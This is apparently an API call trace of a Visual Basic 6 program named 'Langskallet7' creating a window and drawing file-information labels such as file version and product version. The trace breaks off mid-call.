[0318.135] IMalloc:GetSize (This=0x75c266bc, pv=0x50e6f8) returned 0x68 [0318.135] GetCurrentThreadId () returned 0x548 [0318.135] GetCurrentThreadId () returned 0x548 [0318.135] GetCurrentThreadId () returned 0x548 [0318.135] GetCurrentThreadId () returned 0x548 [0318.135] GetCurrentThreadId () returned 0x548 [0318.136] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xb4 [0318.136] GetVersionExA (in: lpVersionInformation=0x18fa7c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x16d5d0c, dwMinorVersion=0x18f9cc, dwBuildNumber=0x18fd00, dwPlatformId=0x18ff70, szCSDVersion="Í\x1eÒw@a\x16") | out: lpVersionInformation=0x18fa7c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0318.136] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0318.136] OleCreateFontIndirect () returned 0x0 [0318.136] lstrlenA (lpString="Langskallet7") returned 12 [0318.137] LoadIconA (hInstance=0x72940000, lpIconName=0x4b1) returned 0x300f7 [0318.137] OleCreatePictureIndirect () returned 0x0 [0318.137] lstrlenA (lpString="Langskallet7") returned 12 [0318.137] lstrlenA (lpString="ThunderRT6") returned 10 [0318.137] lstrcpyA (in: lpString1=0x18fab8, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0318.137] lstrlenA (lpString="ThunderRT6Form") returned 14 [0318.137] lstrcpynA (in: lpString1=0x18fac6, lpString2="DC", iMaxLength=116 | out: lpString1="DC") returned="DC" [0318.137] lstrlenA (lpString="ThunderRT6") returned 10 [0318.137] lstrcpyA (in: lpString1=0x18fa4c, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0318.137] GetClassInfoA (in: hInstance=0x72940000, lpClassName="ThunderRT6Form", lpWndClass=0x18fa78 | out: lpWndClass=0x18fa78) returned 0 [0318.137] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0318.137] RegisterClassA (lpWndClass=0x18fa78) returned 0xe3c109 [0318.137] lstrlenA (lpString="ThunderRT6") returned 10 [0318.137] lstrcpyA (in: lpString1=0x18fa4c, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0318.137] lstrlenA (lpString="ThunderRT6Form") returned 14 [0318.137] lstrcpynA (in: lpString1=0x18fa5a, lpString2="DC", iMaxLength=29 | out: lpString1="DC") returned="DC" [0318.137] RegisterClassA (lpWndClass=0x18fa78) returned 0xc106 [0318.137] AdjustWindowRectEx (in: lpRect=0x18fb78, dwStyle=0x2cb0000, bMenu=0, dwExStyle=0x0 | out: lpRect=0x18fb78) returned 1 [0318.137] CreateWindowExA (dwExStyle=0x0, lpClassName=0xc106, lpWindowName="Langskallet7", dwStyle=0x2cb0000, X=302, Y=284, nWidth=342, nHeight=229, hWndParent=0x2010a, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x20108 [0318.138] NtdllDefWindowProc_A (hWnd=0x20108, Msg=0x81, wParam=0x0, lParam=0x18f69c) returned 0x1 [0318.138] NtdllDefWindowProc_A (hWnd=0x20108, Msg=0x83, wParam=0x0, lParam=0x18f688) returned 0x0 [0318.139] GetSystemMenu (hWnd=0x20108, bRevert=0) returned 0x500ef [0318.140] SetWindowContextHelpId (param_1=0x20108, param_2=0xffffffff) returned 1 [0318.140] NtdllDefWindowProc_A (hWnd=0x20108, Msg=0x1, wParam=0x0, lParam=0x18f69c) returned 0x0 [0318.140] GetDC (hWnd=0x20108) returned 0x70107bb [0318.140] GetTextMetricsA (in: hdc=0x70107bb, lptm=0x18fa64 | out: lptm=0x18fa64) returned 1 [0318.140] SetBkMode (hdc=0x70107bb, mode=1) returned 2 [0318.140] OleTranslateColor () returned 0x0 [0318.140] SetBkColor (hdc=0x70107bb, color=0xf0f0f0) returned 0xffffff [0318.140] OleTranslateColor () returned 0x0 [0318.140] SetTextColor (hdc=0x70107bb, color=0x0) returned 0x0 [0318.140] OleTranslateColor () returned 0x0 [0318.140] CreatePen (iStyle=0, cWidth=1, color=0x0) returned 0x2630079f [0318.140] SelectObject (hdc=0x70107bb, h=0x2630079f) returned 0x1b00017 [0318.140] SelectObject (hdc=0x70107bb, h=0x1900011) returned 0x1900010 [0318.141] ClientToScreen (in: hWnd=0x20108, lpPoint=0x18fa44 | out: lpPoint=0x18fa44) returned 1 [0318.141] SetBrushOrgEx (in: hdc=0x70107bb, x=1, y=5, lppt=0x0 | out: lppt=0x0) returned 1 [0318.141] UnrealizeObject (h=0x1900015) returned 1 [0318.141] SelectObject (hdc=0x70107bb, h=0x1900015) returned 0x1900011 [0318.141] SelectObject (hdc=0x70107bb, h=0x170a021e) returned 0x18a002e [0318.141] GetTextMetricsA (in: hdc=0x70107bb, lptm=0x18f858 | out: lptm=0x18f858) returned 1 [0318.141] GetClientRect (in: hWnd=0x20108, lpRect=0x18fbf8 | out: lpRect=0x18fbf8) returned 1 [0318.141] MapWindowPoints (in: hWndFrom=0x20108, hWndTo=0x0, lpPoints=0x18fbf8, cPoints=0x2 | out: lpPoints=0x18fbf8) returned 20250929 [0318.141] EqualRect (lprc1=0x18fbf8, lprc2=0x18fbd8) returned 1 [0318.141] SetEvent (hEvent=0xb4) returned 1 [0318.141] IsIconic (hWnd=0x20108) returned 0 [0318.141] SendMessageA (hWnd=0x20108, Msg=0x80, wParam=0x1, lParam=0x300f7) returned 0x0 [0318.141] NtdllDefWindowProc_A (hWnd=0x20108, Msg=0x80, wParam=0x1, lParam=0x300f7) returned 0x0 [0318.147] NtdllDefWindowProc_A (hWnd=0x20108, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x30109 [0318.147] IsIconic (hWnd=0x20108) returned 0 [0318.147] IsZoomed (hWnd=0x20108) returned 0 [0318.147] GetClientRect (in: hWnd=0x20108, lpRect=0x18fbec | out: lpRect=0x18fbec) returned 1 [0318.147] GetWindow (hWnd=0x20108, uCmd=0x5) returned 0x0 [0318.147] GetCurrentThreadId () returned 0x548 [0318.147] ShowWindow (hWnd=0x20108, nCmdShow=1) returned 0 [0318.147] NtdllDefWindowProc_A (hWnd=0x20108, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0318.147] NtdllDefWindowProc_A (hWnd=0x20108, Msg=0x46, wParam=0x0, lParam=0x18fb3c) returned 0x0 [0318.148] NtdllDefWindowProc_A (hWnd=0x2010a, Msg=0x46, wParam=0x0, lParam=0x18fb3c) returned 0x0 [0318.148] NtdllDefWindowProc_A (hWnd=0x20108, Msg=0x46, wParam=0x0, lParam=0x18fb3c) returned 0x0 [0318.148] NtdllDefWindowProc_A (hWnd=0x2010a, Msg=0x46, wParam=0x0, lParam=0x18fb3c) returned 0x0 [0318.148] NtdllDefWindowProc_A (hWnd=0x20108, Msg=0x1c, wParam=0x1, lParam=0x5d0) returned 0x0 [0318.148] NtdllDefWindowProc_A (hWnd=0x2010a, Msg=0x1c, wParam=0x1, lParam=0x5d0) returned 0x0 [0318.148] GetWindowLongA (hWnd=0x2010c, nIndex=0) returned 40706204 [0318.148] NtdllDefWindowProc_A (hWnd=0x20108, Msg=0x86, wParam=0x1, lParam=0x0) returned 0x1 [0318.149] IsIconic (hWnd=0x20108) returned 0 [0318.149] GetFocus () returned 0x0 [0318.149] GetFocus () returned 0x0 [0318.149] IsWindowEnabled (hWnd=0x20108) returned 1 [0318.149] GetWindowThreadProcessId (in: hWnd=0x20108, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x548 [0318.149] GetCurrentThreadId () returned 0x548 [0318.149] SetFocus (hWnd=0x20108) returned 0x0 [0318.151] NtdllDefWindowProc_A (hWnd=0x20108, Msg=0x281, wParam=0x1, lParam=0xc000000f) returned 0x0 [0318.152] NtdllDefWindowProc_A (hWnd=0x20108, Msg=0x282, wParam=0x2, lParam=0x0) returned 0x0 [0318.152] IsIconic (hWnd=0x20108) returned 0 [0318.152] GetFocus () returned 0x20108 [0318.152] NtdllDefWindowProc_A (hWnd=0x20108, Msg=0x7, wParam=0x0, lParam=0x0) returned 0x0 [0318.152] IsWindowEnabled (hWnd=0x20108) returned 1 [0318.152] PostMessageA (hWnd=0x20108, Msg=0x100e, wParam=0xa, lParam=0x0) returned 1 [0318.152] IsIconic (hWnd=0x20108) returned 0 [0318.152] PostMessageA (hWnd=0x20108, Msg=0x100e, wParam=0xe, lParam=0x0) returned 1 [0318.152] PostMessageA (hWnd=0x20108, Msg=0x105a, wParam=0x0, lParam=0x0) returned 1 [0318.152] NtdllDefWindowProc_A (hWnd=0x20108, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0318.153] IsIconic (hWnd=0x20108) returned 0 [0318.153] IsIconic (hWnd=0x20108) returned 0 [0318.153] GetParent (hWnd=0x20108) returned 0x0 [0318.153] GetWindowRect (in: hWnd=0x20108, lpRect=0x18f764 | out: lpRect=0x18f764) returned 1 [0318.153] NtdllDefWindowProc_A (hWnd=0x20108, Msg=0x47, wParam=0x0, lParam=0x18fb3c) returned 0x0 [0318.153] GetWindowLongA (hWnd=0x20108, nIndex=-16) returned 382402560 [0318.153] GetClientRect (in: hWnd=0x20108, lpRect=0x18f7d4 | out: lpRect=0x18f7d4) returned 1 [0318.153] MapWindowPoints (in: hWndFrom=0x20108, hWndTo=0x0, lpPoints=0x18f7d4, cPoints=0x2 | out: lpPoints=0x18f7d4) returned 20250929 [0318.155] NtdllDefWindowProc_A (hWnd=0x20108, Msg=0x83, wParam=0x1, lParam=0x18f720) returned 0x0 [0318.156] NtdllDefWindowProc_A (hWnd=0x20108, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0318.157] IsIconic (hWnd=0x20108) returned 0 [0318.157] IsIconic (hWnd=0x20108) returned 0 [0318.157] NtdllDefWindowProc_A (hWnd=0x2010a, Msg=0x47, wParam=0x0, lParam=0x18fb3c) returned 0x0 [0318.157] IsWindowVisible (hWnd=0x20108) returned 1 [0318.157] IsIconic (hWnd=0x20108) returned 0 [0318.157] IsZoomed (hWnd=0x20108) returned 0 [0318.157] NtdllDefWindowProc_A (hWnd=0x20108, Msg=0x5, wParam=0x0, lParam=0xc90150) returned 0x0 [0318.157] GetClientRect (in: hWnd=0x20108, lpRect=0x18f7ac | out: lpRect=0x18f7ac) returned 1 [0318.157] GetWindow (hWnd=0x20108, uCmd=0x5) returned 0x0 [0318.157] NtdllDefWindowProc_A (hWnd=0x20108, Msg=0x3, wParam=0x0, lParam=0x1350131) returned 0x0 [0318.157] GetCurrentThreadId () returned 0x548 [0318.157] PostThreadMessageA (idThread=0x548, Msg=0x1069, wParam=0x0, lParam=0x0) returned 1 [0318.157] GetCurrentProcessId () returned 0x594 [0318.157] PeekMessageA (in: lpMsg=0x18fe58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fe58) returned 1 [0318.157] IsWindow (hWnd=0x20108) returned 1 [0318.157] GetWindowLongA (hWnd=0x20108, nIndex=-16) returned 382402560 [0318.157] IsIconic (hWnd=0x20108) returned 0 [0318.157] GetParent (hWnd=0x20108) returned 0x0 [0318.157] TranslateMessage (lpMsg=0x18fe58) returned 0 [0318.157] DispatchMessageA (lpMsg=0x18fe58) returned 0x0 [0318.157] PeekMessageA (in: lpMsg=0x18fe58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fe58) returned 1 [0318.157] IsWindow (hWnd=0x20108) returned 1 [0318.158] GetWindowLongA (hWnd=0x20108, nIndex=-16) returned 382402560 [0318.158] IsIconic (hWnd=0x20108) returned 0 [0318.158] GetParent (hWnd=0x20108) returned 0x0 [0318.158] TranslateMessage (lpMsg=0x18fe58) returned 0 [0318.158] DispatchMessageA (lpMsg=0x18fe58) returned 0x0 [0318.158] PeekMessageA (in: lpMsg=0x18fe58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fe58) returned 1 [0318.158] IsWindow (hWnd=0x20108) returned 1 [0318.158] GetWindowLongA (hWnd=0x20108, nIndex=-16) returned 382402560 [0318.158] IsIconic (hWnd=0x20108) returned 0 [0318.158] GetParent (hWnd=0x20108) returned 0x0 [0318.158] TranslateMessage (lpMsg=0x18fe58) returned 0 [0318.158] DispatchMessageA (lpMsg=0x18fe58) returned 0x0 [0318.158] GetActiveWindow () returned 0x20108 [0318.158] GetWindowThreadProcessId (in: hWnd=0x20108, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x548 [0318.158] GetFocus () returned 0x20108 [0318.158] PeekMessageA (in: lpMsg=0x18fe58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fe58) returned 1 [0318.158] TranslateMessage (lpMsg=0x18fe58) returned 0 [0318.158] DispatchMessageA (lpMsg=0x18fe58) returned 0x0 [0318.158] PeekMessageA (in: lpMsg=0x18fe58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fe58) returned 1 [0318.158] IsWindow (hWnd=0x20108) returned 1 [0318.158] GetWindowLongA (hWnd=0x20108, nIndex=-16) returned 382402560 [0318.158] IsIconic (hWnd=0x20108) returned 0 [0318.158] GetParent (hWnd=0x20108) returned 0x0 [0318.158] TranslateMessage (lpMsg=0x18fe58) returned 0 [0318.158] DispatchMessageA (lpMsg=0x18fe58) [0318.158] IsIconic (hWnd=0x20108) returned 0 [0318.158] IsIconic (hWnd=0x20108) returned 0 [0318.158] BeginPaint (in: hWnd=0x20108, lpPaint=0x18fa00 | out: lpPaint=0x18fa00) returned 0x70107bb [0318.158] GetClientRect (in: hWnd=0x20108, lpRect=0x18fa40 | out: lpRect=0x18fa40) returned 1 [0318.158] OleTranslateColor () returned 0x0 [0318.158] OleTranslateColor () returned 0x0 [0318.158] CreateSolidBrush (color=0xf0f0f0) returned 0x2d100223 [0318.158] OleTranslateColor () returned 0x0 [0318.158] OleTranslateColor () returned 0x0 [0318.158] SetTextColor (hdc=0x70107bb, color=0x0) returned 0x0 [0318.158] SetBkColor (hdc=0x70107bb, color=0xf0f0f0) returned 0xf0f0f0 [0318.159] FillRect (hDC=0x70107bb, lprc=0x18fa40, hbr=0x2d100223) returned 1 [0318.159] SetTextColor (hdc=0x70107bb, color=0x0) returned 0x0 [0318.159] SetBkColor (hdc=0x70107bb, color=0xf0f0f0) returned 0xf0f0f0 [0318.159] EndPaint (hWnd=0x20108, lpPaint=0x18fa00) returned 1 [0318.159] IsWindowVisible (hWnd=0x20108) returned 1 [0318.159] IsIconic (hWnd=0x20108) returned 0 [0318.159] IsZoomed (hWnd=0x20108) returned 0 [0318.159] ShowWindow (hWnd=0x20108, nCmdShow=0) returned 1 [0318.159] NtdllDefWindowProc_A (hWnd=0x20108, Msg=0x18, wParam=0x0, lParam=0x0) returned 0x0 [0318.159] NtdllDefWindowProc_A (hWnd=0x20108, Msg=0x46, wParam=0x0, lParam=0x18f374) returned 0x0 [0318.159] NtdllDefWindowProc_A (hWnd=0x2010a, Msg=0x46, wParam=0x0, lParam=0x18f374) returned 0x0 [0318.160] GetParent (hWnd=0x20108) returned 0x0 [0318.160] GetWindowRect (in: hWnd=0x20108, lpRect=0x18ef9c | out: lpRect=0x18ef9c) returned 1 [0318.160] NtdllDefWindowProc_A (hWnd=0x20108, Msg=0x47, wParam=0x0, lParam=0x18f374) returned 0x0 [0318.160] GetWindowLongA (hWnd=0x20108, nIndex=-16) returned 113967104 [0318.160] GetClientRect (in: hWnd=0x20108, lpRect=0x18f00c | out: lpRect=0x18f00c) returned 1 [0318.160] MapWindowPoints (in: hWndFrom=0x20108, hWndTo=0x0, lpPoints=0x18f00c, cPoints=0x2 | out: lpPoints=0x18f00c) returned 20250929 [0318.161] NtdllDefWindowProc_A (hWnd=0x20108, Msg=0x86, wParam=0x0, lParam=0x0) returned 0x1 [0318.161] GetFocus () returned 0x20108 [0318.161] GetClassInfoA (in: hInstance=0x72940000, lpClassName="COMBOBOX", lpWndClass=0x18eff0 | out: lpWndClass=0x18eff0) returned 1 [0318.162] NtdllDefWindowProc_A (hWnd=0x20108, Msg=0x1c, wParam=0x0, lParam=0x5d0) returned 0x0 [0318.162] NtdllDefWindowProc_A (hWnd=0x2010a, Msg=0x1c, wParam=0x0, lParam=0x5d0) returned 0x0 [0318.162] GetWindowLongA (hWnd=0x2010c, nIndex=0) returned 40706204 [0318.162] NtdllDefWindowProc_A (hWnd=0x20108, Msg=0x8, wParam=0x0, lParam=0x0) returned 0x0 [0318.162] NtdllDefWindowProc_A (hWnd=0x20108, Msg=0x281, wParam=0x0, lParam=0xc000000f) returned 0x0 [0318.162] NtdllDefWindowProc_A (hWnd=0x20108, Msg=0x282, wParam=0x1, lParam=0x0) returned 0x0 [0318.162] VarAnd (in: pvarLeft=0x18f6f4, pvarRight=0x18f704, pvarResult=0x18f6e4 | out: pvarResult=0x18f6e4) returned 0x0 [0318.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Full filename: ", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0318.163] InvalidateRect (hWnd=0x20108, lpRect=0x0, bErase=1) returned 1 [0318.163] CreateCompatibleBitmap (hdc=0x70107bb, cx=1440, cy=900) returned 0x3f050224 [0318.164] CreateCompatibleDC (hdc=0x70107bb) returned 0x11010268 [0318.164] SelectObject (hdc=0x11010268, h=0x3f050224) returned 0x185000f [0318.164] SetBkMode (hdc=0x11010268, mode=1) returned 2 [0318.164] OleTranslateColor () returned 0x0 [0318.164] SetBkColor (hdc=0x11010268, color=0xf0f0f0) returned 0xffffff [0318.164] OleTranslateColor () returned 0x0 [0318.164] UnrealizeObject (h=0x2d100223) returned 1 [0318.164] FillRect (hDC=0x11010268, lprc=0x18f5a8, hbr=0x2d100223) returned 1 [0318.164] OleCreatePictureIndirect () returned 0x0 [0318.165] SelectObject (hdc=0x11010268, h=0x2630079f) returned 0x1b00017 [0318.165] SelectObject (hdc=0x11010268, h=0x170a021e) returned 0x18a002e [0318.165] SelectObject (hdc=0x11010268, h=0x1900011) returned 0x1900010 [0318.165] SetBrushOrgEx (in: hdc=0x11010268, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0318.165] UnrealizeObject (h=0x1900015) returned 1 [0318.165] SelectObject (hdc=0x11010268, h=0x1900015) returned 0x1900011 [0318.165] SetBkMode (hdc=0x11010268, mode=1) returned 1 [0318.165] OleTranslateColor () returned 0x0 [0318.165] SetBkColor (hdc=0x11010268, color=0xf0f0f0) returned 0xf0f0f0 [0318.165] OleTranslateColor () returned 0x0 [0318.165] SetTextColor (hdc=0x11010268, color=0x0) returned 0x0 [0318.165] GetROP2 (hdc=0x70107bb) returned 13 [0318.165] SetROP2 (hdc=0x11010268, rop2=13) returned 13 [0318.165] SelectObject (hdc=0x70107bb, h=0x1b00016) returned 0x2630079f [0318.165] SelectObject (hdc=0x70107bb, h=0x18a002e) returned 0x170a021e [0318.165] SelectObject (hdc=0x70107bb, h=0x1900015) returned 0x1900015 [0318.165] SelectPalette (hdc=0x70107bb, hPal=0x188000b, bForceBkgd=1) returned 0x188000b [0318.165] OleTranslateColor () returned 0x0 [0318.165] OleTranslateColor () returned 0x0 [0318.165] UnrealizeObject (h=0x2d100223) returned 1 [0318.165] OleTranslateColor () returned 0x0 [0318.165] OleTranslateColor () returned 0x0 [0318.165] SetTextColor (hdc=0x11010268, color=0x0) returned 0x0 [0318.165] SetBkColor (hdc=0x11010268, color=0xf0f0f0) returned 0xf0f0f0 [0318.165] FillRect (hDC=0x11010268, lprc=0x18f5cc, hbr=0x2d100223) returned 1 [0318.165] SetTextColor (hdc=0x11010268, color=0x0) returned 0x0 [0318.165] SetBkColor (hdc=0x11010268, color=0xf0f0f0) returned 0xf0f0f0 [0318.165] SysStringLen (param_1="Full filename: ") returned 0xf [0318.165] SysStringLen (param_1="Full filename: ") returned 0xf [0318.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Full filename: ", cchWideChar=15, lpMultiByteStr=0x18f5e4, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Full filename: ", lpUsedDefaultChar=0x0) returned 15 [0318.165] GetTextExtentPoint32A (in: hdc=0x11010268, lpString="Full filename: ", c=15, psizl=0x18f620 | out: psizl=0x18f620) returned 1 [0318.166] TabbedTextOutA (hdc=0x11010268, x=0, y=0, lpString="Full filename: ", chCount=15, nTabPositions=1, lpnTabStopPositions=0x18f62c, nTabOrigin=0) returned 852032 [0318.166] InvalidateRect (hWnd=0x20108, lpRect=0x0, bErase=1) returned 1 [0318.166] SysStringLen (param_1="\r\n") returned 0x2 [0318.166] SysStringLen (param_1="\r\n") returned 0x2 [0318.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x18f5fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n=t·\x8d\x99r", lpUsedDefaultChar=0x0) returned 2 [0318.167] GetTextExtentPoint32A (in: hdc=0x11010268, lpString="\r\n=t·\x8d\x99r", c=0, psizl=0x18f620 | out: psizl=0x18f620) returned 1 [0318.167] TabbedTextOutA (hdc=0x11010268, x=64, y=0, lpString="\r\n=t·\x8d\x99r", chCount=0, nTabPositions=1, lpnTabStopPositions=0x18f62c, nTabOrigin=0) returned 0 [0318.167] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="File version: ", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0318.167] InvalidateRect (hWnd=0x20108, lpRect=0x0, bErase=1) returned 1 [0318.167] SysStringLen (param_1="File version: ") returned 0xe [0318.167] SysStringLen (param_1="File version: ") returned 0xe [0318.167] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="File version: ", cchWideChar=14, lpMultiByteStr=0x18f5e4, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="File version: \x18", lpUsedDefaultChar=0x0) returned 14 [0318.167] GetTextExtentPoint32A (in: hdc=0x11010268, lpString="File version: \x18", c=14, psizl=0x18f620 | out: psizl=0x18f620) returned 1 [0318.167] TabbedTextOutA (hdc=0x11010268, x=0, y=13, lpString="File version: \x18", chCount=14, nTabPositions=1, lpnTabStopPositions=0x18f62c, nTabOrigin=0) returned 852027 [0318.167] InvalidateRect (hWnd=0x20108, lpRect=0x0, bErase=1) returned 1 [0318.167] SysStringLen (param_1="\r\n") returned 0x2 [0318.167] SysStringLen (param_1="\r\n") returned 0x2 [0318.167] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x18f5fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n=t·\x8d\x99r", lpUsedDefaultChar=0x0) returned 2 [0318.167] GetTextExtentPoint32A (in: hdc=0x11010268, lpString="\r\n=t·\x8d\x99r", c=0, psizl=0x18f620 | out: psizl=0x18f620) returned 1 [0318.167] TabbedTextOutA (hdc=0x11010268, x=59, y=13, lpString="\r\n=t·\x8d\x99r", chCount=0, nTabPositions=1, lpnTabStopPositions=0x18f62c, nTabOrigin=0) returned 0 [0318.167] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Product version: ", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0318.167] InvalidateRect (hWnd=0x20108, lpRect=0x0, bErase=1) returned 1 [0318.167] SysStringLen (param_1="Product version: ") returned 0x11 [0318.167] SysStringLen (param_1="Product version: ") returned 0x11 [0318.167] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Product version: ", cchWideChar=17, lpMultiByteStr=0x18f5e0, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Product version: ö\x18", lpUsedDefaultChar=0x0) returned 17 [0318.168] GetTextExtentPoint32A (in: hdc=0x11010268, lpString="Product version: ö\x18", c=17, psizl=0x18f620 | out: psizl=0x18f620) returned 1 [0318.168] TabbedTextOutA (hdc=0x11010268, x=0, y=26, lpString="Product version: ö\x18", chCount=17, nTabPositions=1, lpnTabStopPositions=0x18f62c, nTabOrigin=0) returned 852048 [0318.168] InvalidateRect (hWnd=0x20108, lpRect=0x0, bErase=1) returned 1 [0318.168] SysStringLen (param_1="\r\n") returned 0x2 [0318.168] SysStringLen (param_1="\r\n") returned 0x2 [0318.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x18f5fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n=t·\x8d\x99r", lpUsedDefaultChar=0x0) returned 2 [0318.168] GetTextExtentPoint32A (in: hdc=0x11010268, lpString="\r\n=t·\x8d\x99r", c=0, psizl=0x18f620 | out: psizl=0x18f620) returned 1 [0318.168] TabbedTextOutA (hdc=0x11010268, x=80, y=26, lpString="\r\n=t·\x8d\x99r", chCount=0, nTabPositions=1, lpnTabStopPositions=0x18f62c, nTabOrigin=0) returned 0 [0318.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="File flags: ", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0318.168] InvalidateRect (hWnd=0x20108, lpRect=0x0, bErase=1) returned 1 [0318.168] SysStringLen (param_1="File flags: ") returned 0xc [0318.168] SysStringLen (param_1="File flags: ") returned 0xc [0318.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="File flags: ", cchWideChar=12, lpMultiByteStr=0x18f5e8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="File flags: z\x8d\x99rXö\x18", lpUsedDefaultChar=0x0) returned 12 [0318.168] GetTextExtentPoint32A (in: hdc=0x11010268, lpString="File flags: z\x8d\x99rXö\x18", c=12, psizl=0x18f620 | out: psizl=0x18f620) returned 1 [0318.168] TabbedTextOutA (hdc=0x11010268, x=0, y=39, lpString="File flags: z\x8d\x99rXö\x18", chCount=12, nTabPositions=1, lpnTabStopPositions=0x18f62c, nTabOrigin=0) returned 852015 [0318.168] InvalidateRect (hWnd=0x20108, lpRect=0x0, bErase=1) returned 1 [0318.168] SysStringLen (param_1="\r\n") returned 0x2 [0318.168] SysStringLen (param_1="\r\n") returned 0x2 [0318.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x18f5fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n=t·\x8d\x99r", lpUsedDefaultChar=0x0) returned 2 [0318.168] GetTextExtentPoint32A (in: hdc=0x11010268, lpString="\r\n=t·\x8d\x99r", c=0, psizl=0x18f620 | out: psizl=0x18f620) returned 1 [0318.168] TabbedTextOutA (hdc=0x11010268, x=47, y=39, lpString="\r\n=t·\x8d\x99r", chCount=0, nTabPositions=1, lpnTabStopPositions=0x18f62c, nTabOrigin=0) returned 0 [0318.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="File OS: Unknown", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0318.168] InvalidateRect (hWnd=0x20108, lpRect=0x0, bErase=1) returned 1 [0318.168] SysStringLen (param_1="File OS: Unknown") returned 0x10 [0318.168] SysStringLen (param_1="File OS: Unknown") returned 0x10 [0318.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="File OS: Unknown", cchWideChar=16, lpMultiByteStr=0x18f5e0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="File OS: UnknownXö\x18", lpUsedDefaultChar=0x0) returned 16 [0318.169] GetTextExtentPoint32A (in: hdc=0x11010268, lpString="File OS: UnknownXö\x18", c=16, psizl=0x18f620 | out: psizl=0x18f620) returned 1 [0318.169] TabbedTextOutA (hdc=0x11010268, x=0, y=52, lpString="File OS: UnknownXö\x18", chCount=16, nTabPositions=1, lpnTabStopPositions=0x18f62c, nTabOrigin=0) returned 852054 [0318.169] InvalidateRect (hWnd=0x20108, lpRect=0x0, bErase=1) returned 1 [0318.169] SysStringLen (param_1="\r\n") returned 0x2 [0318.169] SysStringLen (param_1="\r\n") returned 0x2 [0318.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, 